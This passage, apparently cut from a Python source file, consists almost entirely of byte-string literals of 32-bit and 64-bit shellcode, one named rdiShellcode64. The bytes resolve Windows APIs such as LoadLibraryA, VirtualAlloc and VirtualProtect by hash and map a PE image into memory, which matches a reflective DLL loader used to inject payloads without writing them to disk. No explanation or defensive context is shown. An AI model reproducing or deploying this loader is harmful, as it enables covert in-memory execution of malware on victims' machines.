\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x49\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x3D\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x38\x50\x55\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x44\x24\x38\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x5C\x89\x44\x24\x14\x8D\x84\x24\xB8\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x14\x8D\x84\x24\xBC\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24\x6C\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x3C\x89\x44\x24\x14\x8D\x84\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xB4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x39\x6C\x24\x38\x0F\x84\xD2\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00\x0F\x84\xC5\x06\x00\x00\x39\xAC
\x24\xB0\x00\x00\x00\x0F\x84\xB8\x06\x00\x00\x39\xAC\x24\xBC\x00\x00\x00\x0F\x84\xAB\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\x9C\x06\x00\x00\x8B\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\x84\x06\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\x75\x06\x00\x00\x8B\x46\x38\xA8\x01\x0F\x85\x6A\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x28\x03\xCE\x83\x79\x04\x00\x8B\x39\x74\x03\x8B\x41\x04\x03\xC7\x3B\xC3\x0F\x46\xC3\x83\xC1\x28\x8B\xD8\x8B\x46\x38\x83\xEA\x01\x75\xE1\x8B\xBC\x24\x28\x01\x00\x00\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2\x3B\xE8\x0F\x85\x04\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24\x48\x8B\xD8\x89\x5C\x24\x30\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54\x24\x48\x8B\xD8\x89\x44\x24\x30\xF6\x84\x24\x3C\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24\x18\x33\xC0\x89\x6C\x24\x24\x0F\xB7\x75\x14\x83\xC6\x28\x66\x3B\x45\x06\x73\x3E\x03\xF5\x83\x64\x24\x20\x00\x83\x3E\x00\x76\x22\x8B\x6C\x24\x20\x8B\x46\x04\x8D\x14\x2B\x8B\x4E\xFC\x03\xC5\x45\x8A\x04\x38\x88\x04\x0A\x3B\x2E\x72\xEA\x8B\x6C\x24\x24\x8B\x4C\x24\x18\x0F\xB7\x45\x06\x41\x83\xC6\x28\x89\x4C\x24\x18\x3B\xC8\x72\xC4\x8B\xC3\x2B\x45\x34\x89\x44\x24\x20\x0F\x84\xB8\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xAB\x00\x00\x00\x8B\xB5\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\x9A\x00\x00\x00\x8B\xE8\x8D\x7E\x08\xEB\x74\x0F\xB7\x0F\x66\x8B\xC1\x0F\xB7\xD1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x20\x8B\x16\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x20\x8D\x04\x1A\x8B\x0C\x08\x8D\x04\x1A\x8B\x54\x24\x20\x03\xCD\x89\x0C\x10\xEB\x3C
\x66\x83\xF8\x03\x75\x0F\x8B\x06\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x2C\x02\xEB\x27\x33\xC9\x41\x66\x3B\xC1\x75\x07\x8B\xC5\xC1\xE8\x10\xEB\x0B\x6A\x02\x59\x66\x3B\xC1\x75\x10\x0F\xB7\xC5\x8B\x0E\x81\xE2\xFF\x0F\x00\x00\x03\xD3\x01\x04\x0A\x6A\x02\x58\x03\xF8\x8B\x46\x04\x03\xC6\x3B\xF8\x75\x83\x83\x3F\x00\x8B\xF7\x0F\x85\x73\xFF\xFF\xFF\x8B\x6C\x24\x24\x8B\xBC\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xEF\x01\x00\x00\x8B\xB5\x80\x00\x00\x00\x33\xC0\x89\x84\x24\xAC\x00\x00\x00\x8D\x0C\x1E\x89\x4C\x24\x20\x83\xC1\x0C\x39\x01\x74\x10\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x84\x24\xAC\x00\x00\x00\xF6\x84\x24\x3C\x01\x00\x00\x04\x8B\xD6\x0F\x84\xCF\x00\x00\x00\x33\xC9\x41\x3B\xC1\x0F\x86\xC4\x00\x00\x00\x8B\x8C\x24\x3C\x01\x00\x00\x8D\x50\xFF\x83\xA4\x24\xC0\x00\x00\x00\x00\x89\x54\x24\x28\x8B\xD6\xC1\xE9\x10\x8D\x70\xFF\x89\x4C\x24\x18\x85\xF6\x0F\x84\xA2\x00\x00\x00\x8B\x74\x24\x20\x8B\xDE\x8B\xAC\x24\xC0\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x84\x24\xAC\x00\x00\x00\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01\x00\x00\x83\xC3\x14\x8B\x74\x24\x20\x3B\x6C\x24\x28\x72\x87\x8B\x6C\x24\x24\x8B\x5C\x24\x30\x8B\x4C\x24\x18\x8B\x95\x80\x00\x00\x00\xEB\x08\x8B\x4C\x24\x28\x89\x4C\x24\x18\x8D\x3C\x1A\x8B\x57\x0C\x89\x7C\x24\x30\x85\xD2\x0F\x84\xC9\x00\x00\x00\x8B\xC1\x23\x84\x24\x3C\x01\x00\x00\x83\xE0\x04\x89\x84\x24\xC0\x00\x00\x00\x8D\x04\x1A\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB\x8B\x0E\x85\xC9\x74\x5A\x8B\x7C\x24\x34\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB\x30\x83\xC1\x02\x33\xC0\x03\xCB\x89\x4C\x24\x28\x38\x01\x74\x0B\x40\x41\x80\x39\x00\x75\xF9\x8B\x4C\x24\x28\x55\x66\x89
\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x4C\x24\x1C\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xAE\x8B\x7C\x24\x30\x83\xBC\x24\xC0\x00\x00\x00\x00\x74\x1C\x33\xC0\x40\x39\x84\x24\xAC\x00\x00\x00\x76\x10\x69\x44\x24\x18\xE8\x03\x00\x00\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\x57\x20\x83\xC7\x14\x89\x7C\x24\x30\x85\xD2\x0F\x85\x4E\xFF\xFF\xFF\x8B\x6C\x24\x24\x83\xBD\xE4\x00\x00\x00\x00\x6A\x20\x5A\x0F\x84\xAF\x00\x00\x00\x8B\x85\xE0\x00\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x18\x8B\x00\x85\xC0\x0F\x84\x96\x00\x00\x00\x8B\x6C\x24\x18\x03\xC3\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x34\x8B\x17\x85\xD2\x79\x09\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x28\x38\x02\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x28\x56\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x54\x24\x1C\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x18\x6A\x20\x5A\x03\xEA\x89\x6C\x24\x18\x8B\x45\x00\x85\xC0\x0F\x85\x72\xFF\xFF\xFF\x8B\x6C\x24\x24\x0F\xB7\x75\x14\x33\xC0\x83\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\x81\x00\x00\x00\x03\xF5\x83\x3E\x00\x74\x6B\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x40\xF7\xC1\x00\x00\x00\x20\x75\x18\x85\xC0\x75\x0D\x6A\x08\x58\x6A\x01\x85\xC9\x59\x0F\x49\xC1\xEB\x1D\x6A\x04\x58\x6A\x02\xEB\xF1\x85\xC0\x75\x0A\x6A\x10\xB8\x80\x00\x00\x00\x5A\xEB\x03\x6A\x40\x58\x85\xC9\x0F\x49\xC2\x89\x44\x24\x2C\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89\x44\x24\x2C\x8D\x4C\x24\x2C\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC8\x00\x00\x00\x0F\xB7\x45\x06\x47\x83\xC6\x28\x6A\x20\x5A\x3B\xF8\x72\x81\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC8\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75
\xF1\x8B\x6C\x24\x24\x33\xC0\x40\x50\x50\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xC3\x00\x00\x00\x83\x7D\x7C\x00\x0F\x84\xB9\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84\xA9\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x9F\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB\x83\x64\x24\x34\x00\x03\xCB\x85\xED\x0F\x84\x88\x00\x00\x00\x8B\x37\x6A\x00\x58\x89\x44\x24\x18\x03\xF3\x74\x7B\x8A\x06\x84\xC0\x74\x2B\x8B\x6C\x24\x18\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x18\x8B\x44\x24\x18\x8B\x6A\x18\x39\x84\x24\x2C\x01\x00\x00\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x34\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24\x34\x3B\xC5\x72\xAF\xEB\x35\x0F\xB7\x09\x8B\x42\x1C\x8D\x04\x88\x8B\x04\x18\x03\xC3\xF6\x84\x24\x3C\x01\x00\x00\x08\x74\x0B\x6A\x04\xFF\xB4\x24\x3C\x01\x00\x00\xEB\x0E\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4\x24\x34\x01\x00\x00\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB'
60 | rdiShellcode64 = b'\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF\xC7\x45\xD0\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D\xC8\x44\x8B\xEA\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C\x89\x7D\x00\x4C\x89\x7D\xE8\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x24\xC7\x45\xD4\x72\x00\x6E\x00\xC7\x45\xD8\x65\x00\x6C\x00\xC7\x45\xDC\x33\x00\x32\x00\xC7\x45\xE0\x2E\x00\x64\x00\xC7\x45\xE4\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x64\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x48\x8B\xD8\xE8\x57\x08\x00\x00\x4C\x8B\xE0\x48\x89\x45\xF0\x48\x8D\x45\xD0\xC7\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xC8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x00\xC7\x44\x24\x20\x0E\x00\x0E\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\xC7\x44\x24\x20\x15\x00\x15\x00\x48\x8B\x4C\x24\x38\x48\x8D\x45
\xA8\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x08\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x10\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xE8\xC7\x44\x24\x20\x05\x00\x05\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x18\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xF8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x4C\x39\x7D\xC8\x0F\x84\x03\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\xF9\x06\x00\x00\x4C\x39\x7D\xE8\x0F\x84\xEF\x06\x00\x00\x4C\x39\x7D\x08\x0F\x84\xE5\x06\x00\x00\x4C\x8B\x4D\x10\x4D\x85\xC9\x0F\x84\xD8\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50\x45\x00\x00\x0F\x85\xC5\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xB6\x06\x00\x00\x44\x8B\x47\x38\x45\x8D\x5F\x01\x45\x84\xC3\x0F\x85\xA5\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x29\x44\x0F\xB7\x57\x06\x48\x03\xCF\x8B\x41\x04\x8B\x11\x85\xC0\x75\x06\x41\x8D\x04\x10\xEB\x02\x03\xC2\x3B\xC3\x0F\x46\xC3\x48\x83\xC1\x28\x8B\xD8\x4D\x2B\xD3\x75\xDF\x48\x8D\x4D\x38\x41\xFF\xD1\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x32\x06\x00\x00\x48\x8B\x4F\x30\x41\xB9\x04\x00\x00\x00\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8\x48\x85\xC0\x75\x15\x44\x8D\x48\x04\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B\xD8\x41\xBB\x01\x00\x00\x00\x44\x84\x9D\xD8\x00\x00\x00\x74\x1D\x8B\x46\x3C\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3
\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39\xBF\x94\x00\x00\x00\x0F\x84\x9B\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x8B\x85\xD8\x00\x00\x00\x45\x8B\xE7\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x8E\x00\x00\x00\x45\x3B\xEB\x0F\x86\x85\x00\x00\x00\x44\x8B\xA5\xD8\x00\x00\x00\x45\x8D\x5D\xFF\x41\xC1\xEC\x10\x45\x8B\xD7\x45\x85\xDB\x74\x6E\x4D\x8B\xC8\x41\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41
\x0F\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xBC\x00\x00\x00\x8B\x7D\xC0\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x65\x48\x8B\x7D\xF0\x48\x85\xC9\x79\x08\x45\x0F\xB7\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x28\x45\x33\xC0\x48\x8D\x54\x24\x20\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4D\x8B\xCF\x49\x8B\xCA\xFF\xD7\x49\x83\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA2\x8B\x7D\xC0\x45\x33\xFF\x45\x85\xE4\x74\x14\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xE8\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x4B\xFF\xFF\xFF\x48\x8B\x7D\x30\x44\x8B\xAD\xB8\x00\x00\x00\x4C\x8B\x65\xF0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xB9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49\x83\xC7\x04\x4C\x03\xFB\x41\x8B\x07\x85\xC0\x0F\x84\x9D\x00\x00\x00\x41\xBD\x20\x00\x00\x00\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C\x48\x03\xF3\x4C\x03\xF3\x48\x83\x3E\x00\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7\xC2\x33\xD2\xEB\x33\x4C\x8D\x43\x02\x33\xC0\x4C\x03\xC2\x41\x38\x00\x74\x0E\x49\x8B\xD0\x48\xFF\xC2\x48\xFF\xC0\x80\x3A\x00\x75\xF5\x4C\x89\x44\x24\x28\x48\x8D\x54\x24\x20\x45\x33\xC0\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4C\x8B\xCE\x41\xFF\xD4\x48\x83\xC6\x08\x49\x83\xC6\x08\x48\x83\x3E\x00\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x4D\x03\xFD\x41\x8B\x07\x85\xC0\x0F\x85\x70\xF